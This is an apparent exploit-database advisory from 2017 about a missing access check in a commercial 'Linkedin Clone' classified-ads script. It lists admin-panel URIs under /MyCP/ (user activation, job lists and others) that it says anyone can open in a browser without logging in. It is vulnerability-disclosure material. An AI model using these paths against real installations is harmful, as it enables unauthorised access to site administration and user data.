9 Network Linkedin Clone script suffers from an insecure direct object reference vulnerability.
99528e7b9f3b807e85cc924e8d219106c9dfeb439c4cdc2d2dfc376910c4c738
# # # # #
# Vulnerability: Improper Access Restrictions
# Date: 15.01.2017
# Vendor Homepage: http://theninehertz.com
# Script Name: 9 network Linkedin Clone a Classified Ads Script
# Script Version: v1.0
# Script Buy Now: http://theninehertz.com/linkedin-clone
# Author: Adeghsan Aencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Direct entrance..
# An attacker can exploit this issue via a browser.
# The following example URIs are available:
# http://localhost/[PATH]/MyCP/welcome.php
# http://localhost/[PATH]/MyCP/industry-list.php
# http://localhost/[PATH]/MyCP/active_user.php
# http://localhost/[PATH]/MyCP/deactive_user.php
# http://localhost/[PATH]/MyCP/unverified_user.php
# http://localhost/[PATH]/MyCP/job-list.php
# http://localhost/[PATH]/MyCP/job-pack.php
# Vs.......
# # # # #